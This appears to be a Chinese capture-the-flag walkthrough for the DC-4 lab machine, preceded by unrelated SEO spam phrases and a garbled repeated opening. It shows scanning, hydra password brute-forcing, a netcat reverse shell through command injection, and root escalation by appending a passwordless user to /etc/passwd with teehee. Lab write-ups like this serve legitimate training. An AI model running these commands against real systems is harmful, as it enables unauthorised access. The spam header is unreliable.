定制网站与模板网站,网页美工设计师工资,免费加速器试用一小时,最吸引人的汽车广告语一、准备工作
1.靶机下载链接
链接: 百度网盘 请输入提取码 提取码: 3hq4
2.用ifconfig查看kali的ip 二、信息收集
1.nmap的信息收集
#xff08;1#xff09;主机发现 命令#xff1a;nmap 192.168.101.0/24 #xff08;2#xff09;扫描靶机详细信息
发现主机 192…一、准备工作
1.靶机下载链接
链接: 百度网盘 请输入提取码 提取码: 3hq4
2.用ifconfig查看kali的ip 二、信息收集
1.nmap的信息收集
1主机发现 命令nmap 192.168.101.0/24 2扫描靶机详细信息
发现主机 192.168.101.117判定为DC-4靶机继续使用nmap命令获取靶机开放端口及其协议 命令nmap -A 192.168.101.117 该靶机开放80和22端口访问一下它的网页http://192.168.101.117/ 由上图可知需要admin用户登录 3hydra爆破
1.解压rockyou.txt.gz文件 命令gzip -d rockyou.txt.gz在root权限下 2.爆破密码 命令hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.101.117 http-post-form /login.php:username^USER^password^PASS^:Slogout -F 3.使用爆破出来的密码登录发现命令可以执行 4.尝试抓包 5. 修改命令查看login.php 6. 使用nc命令进行反弹 kali开启监听nc -lvvp 4444 radio后面添加的命令nc 192.168.101.10 1234 -e /bin/bash 7.优化命令执行终端
执行下面命令进入python交互式(注意要下载python环境才能运行): python -c ‘import pty;pty.spawn(“/bin/bash”)’ 8.利用发现的字典爆破jim用户的密码
1在jim目录下面发现一个字典的备份 2查看其他两个文件 3把刚才找到的字典复制出来 命令leafpad dc-4 4尝试ssh爆破使用hydra工具爆破 命令 hydra -l jim -P dc-4 ssh://192.168.101.117 9.ssh远程登录jim用户 6查看jim用户文件
1.查看/var/jim内容如下 2.发现用户charles的密码尝试登录结果登录成功 3.查看用户权限发现该用户可以以root权限免密码执行 /usr/bin/teehee 命令sudo -l 三、提权
1.直接向/etc/passwd中增加内容
1 添加一个 hack用户,并使用teehee执行写入 passwd中 命令 echo admin::0:0:::/bin/bash | sudo teehee -a /etc/passwd 2无密码登录root 命令su admin 2.拿下flag
进入到/root目录下发现flag.txt文件 命令1.cd /root2.ls3.cat flag.txt
